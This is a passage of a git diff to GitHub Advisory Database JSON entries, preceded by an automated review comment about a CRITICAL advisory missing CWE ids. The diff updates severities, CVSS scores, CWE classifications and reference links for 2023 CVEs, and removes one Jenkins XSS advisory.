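Review bot: The `@@ -34,7 +34,7 @@` hunk of GHSA-g22j-4jxh-2vc7 sets `"severity": "CRITICAL"` while `cwe_ids` on the preceding lines stays an empty array, so the highest-severity entry in this batch has no weakness classification at all. Pipelines that route or filter advisories by CWE will silently drop it, which is the opposite of what a CRITICAL rating should produce. Populate `cwe_ids` from the upstream classification if one exists, or make the absence explicit so downstream consumers do not mistake it for a data gap in their own ingest.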
@@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5418" diff --git a/advisories/unreviewed/2023/05/GHSA-gp23-w687-38gc/GHSA-gp23-w687-38gc.json b/advisories/unreviewed/2023/05/GHSA-gp23-w687-38gc/GHSA-gp23-w687-38gc.json index cf6cb8e53d577..2f1539936724e 100644 --- a/advisories/unreviewed/2023/05/GHSA-gp23-w687-38gc/GHSA-gp23-w687-38gc.json +++ b/advisories/unreviewed/2023/05/GHSA-gp23-w687-38gc/GHSA-gp23-w687-38gc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gp23-w687-38gc", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33797" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-h26m-gxx2-8f39/GHSA-h26m-gxx2-8f39.json b/advisories/unreviewed/2023/05/GHSA-h26m-gxx2-8f39/GHSA-h26m-gxx2-8f39.json index b3d6cacf50c50..278246ad2359b 100644 --- a/advisories/unreviewed/2023/05/GHSA-h26m-gxx2-8f39/GHSA-h26m-gxx2-8f39.json +++ b/advisories/unreviewed/2023/05/GHSA-h26m-gxx2-8f39/GHSA-h26m-gxx2-8f39.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h26m-gxx2-8f39", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33795" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-h85c-f8f5-f6q9/GHSA-h85c-f8f5-f6q9.json b/advisories/unreviewed/2023/05/GHSA-h85c-f8f5-f6q9/GHSA-h85c-f8f5-f6q9.json index 1e8377df96699..32af5773aed2d 100644 
--- a/advisories/unreviewed/2023/05/GHSA-h85c-f8f5-f6q9/GHSA-h85c-f8f5-f6q9.json +++ b/advisories/unreviewed/2023/05/GHSA-h85c-f8f5-f6q9/GHSA-h85c-f8f5-f6q9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h85c-f8f5-f6q9", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33789" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-h9jw-g3xj-5hwg/GHSA-h9jw-g3xj-5hwg.json b/advisories/unreviewed/2023/05/GHSA-h9jw-g3xj-5hwg/GHSA-h9jw-g3xj-5hwg.json index a73d330edf285..2d06e2ccedcc0 100644 --- a/advisories/unreviewed/2023/05/GHSA-h9jw-g3xj-5hwg/GHSA-h9jw-g3xj-5hwg.json +++ b/advisories/unreviewed/2023/05/GHSA-h9jw-g3xj-5hwg/GHSA-h9jw-g3xj-5hwg.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-05" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0005/" + }, { "type": "WEB", "url": "https://www.libssh.org/security/advisories/CVE-2023-2283.txt" diff --git a/advisories/unreviewed/2023/05/GHSA-hg43-j454-5m9f/GHSA-hg43-j454-5m9f.json b/advisories/unreviewed/2023/05/GHSA-hg43-j454-5m9f/GHSA-hg43-j454-5m9f.json index 3e81dfd008d54..d02bbad9885f6 100644 --- a/advisories/unreviewed/2023/05/GHSA-hg43-j454-5m9f/GHSA-hg43-j454-5m9f.json +++ b/advisories/unreviewed/2023/05/GHSA-hg43-j454-5m9f/GHSA-hg43-j454-5m9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hg43-j454-5m9f", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:20Z", "aliases": [ "CVE-2023-33799" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:11Z" 
diff --git a/advisories/unreviewed/2023/05/GHSA-hwqw-p9h2-q5q4/GHSA-hwqw-p9h2-q5q4.json b/advisories/unreviewed/2023/05/GHSA-hwqw-p9h2-q5q4/GHSA-hwqw-p9h2-q5q4.json index da6232f386601..ede4a1f35063b 100644 --- a/advisories/unreviewed/2023/05/GHSA-hwqw-p9h2-q5q4/GHSA-hwqw-p9h2-q5q4.json +++ b/advisories/unreviewed/2023/05/GHSA-hwqw-p9h2-q5q4/GHSA-hwqw-p9h2-q5q4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hwqw-p9h2-q5q4", - "modified": "2023-05-27T06:30:41Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-05-24T21:30:19Z", "aliases": [ "CVE-2023-33792" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-24T20:15:10Z" diff --git a/advisories/unreviewed/2023/05/GHSA-j2m5-w7qp-hqg7/GHSA-j2m5-w7qp-hqg7.json b/advisories/unreviewed/2023/05/GHSA-j2m5-w7qp-hqg7/GHSA-j2m5-w7qp-hqg7.json index ee3ea323b5e20..a69581a1f2499 100644 --- a/advisories/unreviewed/2023/05/GHSA-j2m5-w7qp-hqg7/GHSA-j2m5-w7qp-hqg7.json +++ b/advisories/unreviewed/2023/05/GHSA-j2m5-w7qp-hqg7/GHSA-j2m5-w7qp-hqg7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j2m5-w7qp-hqg7", - "modified": "2023-05-29T00:30:43Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-05-29T00:30:43Z", "aliases": [ "CVE-2023-32763" ], "details": "An issue was discovered in Qt before 5.15.15, 6.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.1. When a SVG file with an image inside it is rendered, a QTextLayout buffer overflow can be triggered.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
@@ -22,16 +25,24 @@
 "type": "WEB",
 "url": "https://codereview.qt-project.org/c/qt/qtbase/+/476125"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00028.html"
+ },
 {
 "type": "WEB",
 "url": "https://lists.qt-project.org/pipermail/announce/2023-May/000413.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-03"
 }
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-120"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-05-28T23:15:09Z"
diff --git a/advisories/unreviewed/2023/05/GHSA-j7hm-p94x-q9pw/GHSA-j7hm-p94x-q9pw.json b/advisories/unreviewed/2023/05/GHSA-j7hm-p94x-q9pw/GHSA-j7hm-p94x-q9pw.json
index 6d567c901825f..28676aa9e9801 100644
--- a/advisories/unreviewed/2023/05/GHSA-j7hm-p94x-q9pw/GHSA-j7hm-p94x-q9pw.json
+++ b/advisories/unreviewed/2023/05/GHSA-j7hm-p94x-q9pw/GHSA-j7hm-p94x-q9pw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j7hm-p94x-q9pw",
- "modified": "2023-05-10T15:30:19Z",
+ "modified": "2024-02-01T03:30:22Z",
 "published": "2023-05-03T12:30:41Z",
 "aliases": [
 "CVE-2022-40302"
@@ -38,7 +38,7 @@
 "cwe_ids": [
 "CWE-125"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-05-03T12:16:27Z"
diff --git a/advisories/unreviewed/2023/05/GHSA-m3cx-vc9q-88c3/GHSA-m3cx-vc9q-88c3.json b/advisories/unreviewed/2023/05/GHSA-m3cx-vc9q-88c3/GHSA-m3cx-vc9q-88c3.json
index 303f9d99efea3..61ed9f97ca946 100644
--- a/advisories/unreviewed/2023/05/GHSA-m3cx-vc9q-88c3/GHSA-m3cx-vc9q-88c3.json
+++ b/advisories/unreviewed/2023/05/GHSA-m3cx-vc9q-88c3/GHSA-m3cx-vc9q-88c3.json
@@ -33,6 +33,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5418"
diff --git a/advisories/unreviewed/2023/05/GHSA-m73q-fj49-fjhp/GHSA-m73q-fj49-fjhp.json b/advisories/unreviewed/2023/05/GHSA-m73q-fj49-fjhp/GHSA-m73q-fj49-fjhp.json
index 3e1b14efed0db..ad5576c783233 100644
--- a/advisories/unreviewed/2023/05/GHSA-m73q-fj49-fjhp/GHSA-m73q-fj49-fjhp.json
+++ b/advisories/unreviewed/2023/05/GHSA-m73q-fj49-fjhp/GHSA-m73q-fj49-fjhp.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5418"
diff --git a/advisories/unreviewed/2023/05/GHSA-mh43-3443-v7hq/GHSA-mh43-3443-v7hq.json b/advisories/unreviewed/2023/05/GHSA-mh43-3443-v7hq/GHSA-mh43-3443-v7hq.json
index a079d3f83624a..3ddcf778d6fd2 100644
--- a/advisories/unreviewed/2023/05/GHSA-mh43-3443-v7hq/GHSA-mh43-3443-v7hq.json
+++ b/advisories/unreviewed/2023/05/GHSA-mh43-3443-v7hq/GHSA-mh43-3443-v7hq.json
@@ -33,6 +33,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5418"
diff --git a/advisories/unreviewed/2023/05/GHSA-mqff-qm67-cr66/GHSA-mqff-qm67-cr66.json b/advisories/unreviewed/2023/05/GHSA-mqff-qm67-cr66/GHSA-mqff-qm67-cr66.json
index eec08a274669e..df99a55e41659 100644
--- a/advisories/unreviewed/2023/05/GHSA-mqff-qm67-cr66/GHSA-mqff-qm67-cr66.json
+++ b/advisories/unreviewed/2023/05/GHSA-mqff-qm67-cr66/GHSA-mqff-qm67-cr66.json
@@ -33,6 +33,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5418"
diff --git a/advisories/unreviewed/2023/05/GHSA-q53r-r56j-6vxp/GHSA-q53r-r56j-6vxp.json b/advisories/unreviewed/2023/05/GHSA-q53r-r56j-6vxp/GHSA-q53r-r56j-6vxp.json
index 65a0218c99147..92838a4bd4a05 100644
--- a/advisories/unreviewed/2023/05/GHSA-q53r-r56j-6vxp/GHSA-q53r-r56j-6vxp.json
+++ b/advisories/unreviewed/2023/05/GHSA-q53r-r56j-6vxp/GHSA-q53r-r56j-6vxp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q53r-r56j-6vxp",
- "modified": "2023-05-27T06:30:41Z",
+ "modified": "2024-02-02T15:30:28Z",
 "published": "2023-05-24T21:30:19Z",
 "aliases": [
 "CVE-2023-33790"
@@ -30,7 +30,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-05-24T20:15:10Z"
diff --git a/advisories/unreviewed/2023/05/GHSA-qrc7-3p69-2jpf/GHSA-qrc7-3p69-2jpf.json b/advisories/unreviewed/2023/05/GHSA-qrc7-3p69-2jpf/GHSA-qrc7-3p69-2jpf.json
index e70c6b9546e10..cc13d00503cc7 100644
--- a/advisories/unreviewed/2023/05/GHSA-qrc7-3p69-2jpf/GHSA-qrc7-3p69-2jpf.json
+++ b/advisories/unreviewed/2023/05/GHSA-qrc7-3p69-2jpf/GHSA-qrc7-3p69-2jpf.json
@@ -33,6 +33,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5418"
diff --git a/advisories/unreviewed/2023/05/GHSA-qw3p-g4v7-86mq/GHSA-qw3p-g4v7-86mq.json b/advisories/unreviewed/2023/05/GHSA-qw3p-g4v7-86mq/GHSA-qw3p-g4v7-86mq.json
index cc36782decd2d..517895dcd9193 100644
--- a/advisories/unreviewed/2023/05/GHSA-qw3p-g4v7-86mq/GHSA-qw3p-g4v7-86mq.json
+++ b/advisories/unreviewed/2023/05/GHSA-qw3p-g4v7-86mq/GHSA-qw3p-g4v7-86mq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qw3p-g4v7-86mq",
- "modified": "2023-05-27T06:30:41Z",
+ "modified": "2024-02-02T15:30:27Z",
 "published": "2023-05-24T21:30:19Z",
 "aliases": [
 "CVE-2023-33785"
@@ -30,7 +30,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-05-24T20:15:10Z"
diff --git a/advisories/unreviewed/2023/05/GHSA-vp9w-43wr-g8fj/GHSA-vp9w-43wr-g8fj.json b/advisories/unreviewed/2023/05/GHSA-vp9w-43wr-g8fj/GHSA-vp9w-43wr-g8fj.json
index d598592a10d5b..3f0c57ca934f7 100644
--- a/advisories/unreviewed/2023/05/GHSA-vp9w-43wr-g8fj/GHSA-vp9w-43wr-g8fj.json
+++ b/advisories/unreviewed/2023/05/GHSA-vp9w-43wr-g8fj/GHSA-vp9w-43wr-g8fj.json
@@ -29,6 +29,10 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240202-0004/"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5480"
diff --git a/advisories/unreviewed/2023/05/GHSA-vpfc-9392-2w4q/GHSA-vpfc-9392-2w4q.json b/advisories/unreviewed/2023/05/GHSA-vpfc-9392-2w4q/GHSA-vpfc-9392-2w4q.json
index 1a7a6a449a8ba..52c92cd181252 100644
--- a/advisories/unreviewed/2023/05/GHSA-vpfc-9392-2w4q/GHSA-vpfc-9392-2w4q.json
+++ b/advisories/unreviewed/2023/05/GHSA-vpfc-9392-2w4q/GHSA-vpfc-9392-2w4q.json
@@ -33,6 +33,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5418"
diff --git a/advisories/unreviewed/2023/05/GHSA-w3xh-m877-x3c2/GHSA-w3xh-m877-x3c2.json b/advisories/unreviewed/2023/05/GHSA-w3xh-m877-x3c2/GHSA-w3xh-m877-x3c2.json
index 4ed8d0275ada9..8dc3c828c34a5 100644
--- a/advisories/unreviewed/2023/05/GHSA-w3xh-m877-x3c2/GHSA-w3xh-m877-x3c2.json
+++ b/advisories/unreviewed/2023/05/GHSA-w3xh-m877-x3c2/GHSA-w3xh-m877-x3c2.json
@@ -33,6 +33,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5418"
diff --git a/advisories/unreviewed/2023/05/GHSA-wf2q-fvpq-94cc/GHSA-wf2q-fvpq-94cc.json b/advisories/unreviewed/2023/05/GHSA-wf2q-fvpq-94cc/GHSA-wf2q-fvpq-94cc.json
index 9cb642520716d..e242af6db05f1 100644
--- a/advisories/unreviewed/2023/05/GHSA-wf2q-fvpq-94cc/GHSA-wf2q-fvpq-94cc.json
+++ b/advisories/unreviewed/2023/05/GHSA-wf2q-fvpq-94cc/GHSA-wf2q-fvpq-94cc.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wf2q-fvpq-94cc",
- "modified": "2023-05-27T06:30:41Z",
+ "modified": "2024-02-02T15:30:28Z",
 "published": "2023-05-24T21:30:19Z",
 "aliases": [
 "CVE-2023-33794"
@@ -30,7 +30,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-05-24T20:15:10Z"
diff --git a/advisories/unreviewed/2023/05/GHSA-wwgm-wrpv-h3h4/GHSA-wwgm-wrpv-h3h4.json b/advisories/unreviewed/2023/05/GHSA-wwgm-wrpv-h3h4/GHSA-wwgm-wrpv-h3h4.json
index fc8c234442ed0..7a0b01ca630a4 100644
--- a/advisories/unreviewed/2023/05/GHSA-wwgm-wrpv-h3h4/GHSA-wwgm-wrpv-h3h4.json
+++ b/advisories/unreviewed/2023/05/GHSA-wwgm-wrpv-h3h4/GHSA-wwgm-wrpv-h3h4.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wwgm-wrpv-h3h4",
- "modified": "2023-05-27T06:30:41Z",
+ "modified": "2024-02-02T15:30:28Z",
 "published": "2023-05-24T21:30:19Z",
 "aliases": [
 "CVE-2023-33798"
@@ -30,7 +30,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-05-24T20:15:10Z"
diff --git a/advisories/unreviewed/2023/05/GHSA-x723-3x32-qg44/GHSA-x723-3x32-qg44.json b/advisories/unreviewed/2023/05/GHSA-x723-3x32-qg44/GHSA-x723-3x32-qg44.json
index ea65a90e9ef93..bd23007ea718c 100644
--- a/advisories/unreviewed/2023/05/GHSA-x723-3x32-qg44/GHSA-x723-3x32-qg44.json
+++ b/advisories/unreviewed/2023/05/GHSA-x723-3x32-qg44/GHSA-x723-3x32-qg44.json
@@ -33,6 +33,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5418"
diff --git a/advisories/unreviewed/2023/06/GHSA-23vj-5jhc-26rp/GHSA-23vj-5jhc-26rp.json b/advisories/unreviewed/2023/06/GHSA-23vj-5jhc-26rp/GHSA-23vj-5jhc-26rp.json
index d6ee7bf9787f5..63b44f0440ddb 100644
--- a/advisories/unreviewed/2023/06/GHSA-23vj-5jhc-26rp/GHSA-23vj-5jhc-26rp.json
+++ b/advisories/unreviewed/2023/06/GHSA-23vj-5jhc-26rp/GHSA-23vj-5jhc-26rp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-23vj-5jhc-26rp",
- "modified": "2023-06-03T03:30:15Z",
+ "modified": "2024-02-03T09:30:17Z",
 "published": "2023-06-03T03:30:15Z",
 "aliases": [
 "CVE-2023-33143"
@@ -24,13 +24,17 @@
 {
 "type": "WEB",
 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33143"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-05"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-03T01:15:36Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-2rpx-x37c-9w5p/GHSA-2rpx-x37c-9w5p.json b/advisories/unreviewed/2023/06/GHSA-2rpx-x37c-9w5p/GHSA-2rpx-x37c-9w5p.json
index 7f7973dd83749..e854215eb36a5 100644
--- a/advisories/unreviewed/2023/06/GHSA-2rpx-x37c-9w5p/GHSA-2rpx-x37c-9w5p.json
+++ b/advisories/unreviewed/2023/06/GHSA-2rpx-x37c-9w5p/GHSA-2rpx-x37c-9w5p.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5428"
diff --git a/advisories/unreviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json b/advisories/unreviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json
deleted file mode 100644
index c9ecdc216bb28..0000000000000
--- a/advisories/unreviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-39r8-4962-j7vg",
- "modified": "2023-06-23T15:30:41Z",
- "published": "2023-06-14T15:30:37Z",
- "aliases": [
- "CVE-2023-35144"
- ],
- "details": "Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape project and build display names on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35144"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2951"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-06-14T13:15:12Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/06/GHSA-3m5x-qv26-v6mr/GHSA-3m5x-qv26-v6mr.json b/advisories/unreviewed/2023/06/GHSA-3m5x-qv26-v6mr/GHSA-3m5x-qv26-v6mr.json
index 710d8127e0ae2..223c2fd41cede 100644
--- a/advisories/unreviewed/2023/06/GHSA-3m5x-qv26-v6mr/GHSA-3m5x-qv26-v6mr.json
+++ b/advisories/unreviewed/2023/06/GHSA-3m5x-qv26-v6mr/GHSA-3m5x-qv26-v6mr.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3m5x-qv26-v6mr",
- "modified": "2023-06-14T00:30:41Z",
+ "modified": "2024-02-03T09:30:17Z",
 "published": "2023-06-14T00:30:41Z",
 "aliases": [
 "CVE-2023-33145"
@@ -24,13 +24,17 @@
 {
 "type": "WEB",
 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33145"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-05"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-14T00:15:12Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-4297-fx5c-x987/GHSA-4297-fx5c-x987.json b/advisories/unreviewed/2023/06/GHSA-4297-fx5c-x987/GHSA-4297-fx5c-x987.json
index 256280313816a..c07e607a1c64e 100644
--- a/advisories/unreviewed/2023/06/GHSA-4297-fx5c-x987/GHSA-4297-fx5c-x987.json
+++ b/advisories/unreviewed/2023/06/GHSA-4297-fx5c-x987/GHSA-4297-fx5c-x987.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4297-fx5c-x987",
- "modified": "2023-06-26T21:31:00Z",
+ "modified": "2024-01-31T18:31:17Z",
 "published": "2023-06-26T21:31:00Z",
 "aliases": [
 "CVE-2023-3420"
 ],
 "details": "Type Confusion in V8 in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -25,13 +28,29 @@
 {
 "type": "WEB",
 "url": "https://crbug.com/1452137"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KREKCQTJDVI2AEBG5ECZPSOQXIC2L5XL/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBAHED5YFJPRGSEKNZIYHZBGSVHGEHOH/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.debian.org/security/2023/dsa-5440"
 }
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-843"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-26T21:15:09Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-5rc2-qffv-3c8p/GHSA-5rc2-qffv-3c8p.json b/advisories/unreviewed/2023/06/GHSA-5rc2-qffv-3c8p/GHSA-5rc2-qffv-3c8p.json
index 487dda08cfe5d..47b9eeb50d96a 100644
--- a/advisories/unreviewed/2023/06/GHSA-5rc2-qffv-3c8p/GHSA-5rc2-qffv-3c8p.json
+++ b/advisories/unreviewed/2023/06/GHSA-5rc2-qffv-3c8p/GHSA-5rc2-qffv-3c8p.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5rc2-qffv-3c8p",
- "modified": "2023-06-30T03:30:17Z",
+ "modified": "2024-02-01T15:30:24Z",
 "published": "2023-06-14T09:30:42Z",
 "aliases": [
 "CVE-2023-30631"
@@ -46,7 +46,7 @@
 "cwe_ids": [
 "CWE-20"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-14T08:15:09Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-5rw6-vf4w-p4j3/GHSA-5rw6-vf4w-p4j3.json b/advisories/unreviewed/2023/06/GHSA-5rw6-vf4w-p4j3/GHSA-5rw6-vf4w-p4j3.json
index 5c607916f3616..d8b25322ef1c4 100644
--- a/advisories/unreviewed/2023/06/GHSA-5rw6-vf4w-p4j3/GHSA-5rw6-vf4w-p4j3.json
+++ b/advisories/unreviewed/2023/06/GHSA-5rw6-vf4w-p4j3/GHSA-5rw6-vf4w-p4j3.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5428"
diff --git a/advisories/unreviewed/2023/06/GHSA-6c6g-97p2-3xrq/GHSA-6c6g-97p2-3xrq.json b/advisories/unreviewed/2023/06/GHSA-6c6g-97p2-3xrq/GHSA-6c6g-97p2-3xrq.json
index 6fcb21be4a710..d22b9e6224fdd 100644
--- a/advisories/unreviewed/2023/06/GHSA-6c6g-97p2-3xrq/GHSA-6c6g-97p2-3xrq.json
+++ b/advisories/unreviewed/2023/06/GHSA-6c6g-97p2-3xrq/GHSA-6c6g-97p2-3xrq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-6c6g-97p2-3xrq",
- "modified": "2023-06-07T18:30:18Z",
+ "modified": "2024-02-03T09:30:17Z",
 "published": "2023-06-07T18:30:18Z",
 "aliases": [
 "CVE-2023-29345"
@@ -24,13 +24,17 @@
 {
 "type": "WEB",
